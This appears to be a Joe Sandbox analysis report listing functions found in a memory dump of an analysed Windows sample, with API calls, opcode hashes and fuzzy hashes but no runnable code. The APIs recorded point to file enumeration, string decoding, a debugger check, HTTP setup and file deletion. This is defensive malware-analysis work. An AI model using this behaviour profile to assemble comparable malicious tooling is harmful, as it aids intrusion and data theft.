• String ID:
• API String ID: 4275171209-0
• Opcode ID: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
• Instruction ID: fde5f217f82ebe29c984b4a8bf476fe36905b452798d5d1b4171e59d2cf25e0a
• Opcode Fuzzy Hash: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
• Instruction Fuzzy Hash: 1BE02232E453642BE214AB7CCC4896777DAAF85244B098628E840CB322FA21EE40C2C4
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true (associated dumps identical to those listed for the first function in this section)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: lstrcmpi
• String ID:
• API String ID: 1586166983-0
• Opcode ID: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
• Instruction ID: 0df1f5f79d30fcabe98c6cb3613603f4b5a0cecef6749fcbca2d7a1ce428ac3c
• Opcode Fuzzy Hash: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
• Instruction Fuzzy Hash: 35D092317043158FC744CF59ECC4A8A77A6AF896163189568E009CB22ADA31ED92CA88
APIs
• FindFirstFileA.KERNEL32(00000000,?), ref: 0041E42B
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true (associated dumps identical to those listed for the first function in this section)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: FileFindFirst
• String ID: 0
• API String ID: 1974802433-4000257214
• Opcode ID: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
• Instruction ID: 444d2139b4423df7e404c14bc0898a50738c756d6f3279185a54cc7c24eee840
• Opcode Fuzzy Hash: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
• Instruction Fuzzy Hash: 9A2162B67001549FC704DF6CDDE0EA933B9EBC9604B084168E915E3362E6B4AE14CB59
APIs
• FindFirstFileA.KERNEL32(00000000,?), ref: 00420455
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
APIs
• FindFirstFileA.KERNEL32(00000000,?), ref: 00424A63
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
APIs
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041FC8A
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: BinaryCryptString
• String ID:
• API String ID: 80407269-0
APIs
• NtQueryInformationProcess.NTDLL(00000000,00000007,?,00000004,00000000), ref: 0040164E
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                                                                      • Instruction ID: 089dadb44dc18b0797678ef5ba442c8809652ba94fb7cfa67b65c038052ec9a1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE012362163549FC614CF18D8D4E16B3A9EF8AA54B1B446CD50257742D620ED10CB64
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                      • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                      • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0041E204
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 0041E224
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0067CC4C), ref: 0041E254
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041E26F
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(0067CCAB,0067CCAB), ref: 0041E29F
                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E301
                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E320
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0041E33C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$Heap$Free$AllocDeleteFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1985952241-0
                                                                                                                                                                                                                      • Opcode ID: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
                                                                                                                                                                                                                      • Instruction ID: 24bc4b787eba163100fbfc58756f5204999f887e60b27380e355edf6f9f48f95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91410579601204AFC704DF68EDD596AB7B8FF986007080065ED05E7371EAB4FE12DB6A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3722407311-0
                                                                                                                                                                                                                      • Opcode ID: 3bf3ba5641bcf99497e469fec77b724b2c10feb8ef39c834a77696430b12b83d
                                                                                                                                                                                                                      • Instruction ID: 67b5a4a5b04daad7a95f60bd5bee8071c83f245bd0fc84978605f90964d48742
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bf3ba5641bcf99497e469fec77b724b2c10feb8ef39c834a77696430b12b83d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FF14BB5A02204DFD208DF2CEDD8E29B7E5FB89304705456CED1597361EEB4E8528B2A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3722407311-0
                                                                                                                                                                                                                      • Opcode ID: 93f08abacc95682a9c454f0aeec93fbafce23c33d6c2ac6c23b768737a7c3e7a
                                                                                                                                                                                                                      • Instruction ID: 2d8285d9dab4c637f8c7953bcd4f462bcb5e2ae0e6670f6db3990a7f1b9a1ef9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93f08abacc95682a9c454f0aeec93fbafce23c33d6c2ac6c23b768737a7c3e7a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EAC14D75B02208DFD208DF2CEDC8E2977E5FB893047040568ED55D7361EEB4E8568B2A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$memset
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 2788080104-4000257214
                                                                                                                                                                                                                      • Opcode ID: 6fe66ccf17b5f2372aacb9bc4733db90d8f29e2b90b15169104d88f3493ba66a
                                                                                                                                                                                                                      • Instruction ID: 371a5831eea4a37533a13f2d53e422aecd75df1e672aac2beebf4d7c28b1b7a3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fe66ccf17b5f2372aacb9bc4733db90d8f29e2b90b15169104d88f3493ba66a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41316B76A002049FCB14DF68DC91BA977F4FB89704F04447AE909D7320EBB0AE44CB96
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$memset
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 2788080104-4000257214
                                                                                                                                                                                                                      • Opcode ID: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                                                                      • Instruction ID: 114670f2cd88bf99f37d533532433d574fa85a0011b7eefcf1e9e4fcfdc3aaaf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc3a03154b3e2295211f1e0eed9f91dac7bf6ae7ceb0bffc97bae97d78ff6656
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62317CB5A002049FDB14DF68DC91B9977F9EF89704F0845AAED06D7320E7B0AE44CB86
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00442CA8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00442CF1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                                                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                                                                                                                                      • API String ID: 190572456-1775429166
                                                                                                                                                                                                                      • Opcode ID: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                                                                      • Instruction ID: 99a9e5799e649aa26cca8c53ff1b95307459894a29596d3904e707583eccb788
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A516EB9681141AFCB86DF54EC99811BBBABB4C35431600ADE9758B370F7F1AC08DB19
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,0067D0F7,?,?,?,?), ref: 004313AA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: QueryValue
• String ID: " $^\w$^\w
• API String ID: 3660427363-1957396040
• Opcode ID: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
• Instruction ID: 0d34f9e0d8b49bd60d604e6c48f6b3b48a5b9a3a064a98a57d4dcc57e91ac9fb
• Opcode Fuzzy Hash: bdee0981f7683c089e8fb0345dc9a6bc8c278a54ce06050ad66f8a61e1657eb1
• Instruction Fuzzy Hash: 9CF01879641110BFD214DF44DC89EA5B7BCEF55710F144869F948D7320EA64BC118A66
APIs
• lstrcatA.KERNEL32(?,0067CC40), ref: 0041C8FB
• lstrcatA.KERNEL32(?,0067CC49), ref: 0041C92E
• lstrcatA.KERNEL32(?,0067CC4C), ref: 0041C979
• lstrcatA.KERNEL32(?,0067CC4F), ref: 0041C9C4
Similarity
• API ID: lstrcat
• String ID:
• API String ID: 4038537762-0
• Opcode ID: 5a69b92d21b9110e19577aac633a2116fd3e8a6647154e17db158134b7705218
• Instruction ID: 91129cc135b6de1bd884046890de669bd94a0d0b4a39d456f35227959ca6c7b2
• Opcode Fuzzy Hash: 5a69b92d21b9110e19577aac633a2116fd3e8a6647154e17db158134b7705218
• Instruction Fuzzy Hash: BC5183B6A00115AFCB04DF98DD81AD9B3B4FF58310B084479E906D3361FBB8AA59CF55
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
Strings
Similarity
• API ID: CopyFile
• String ID: 0$ 0
• API String ID: 1304948518-2612948726
• Opcode ID: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
• Instruction ID: de3a1f93126c12deb6ed219e4da2e682fdb512e8e31929a1438dbe72cb210f2e
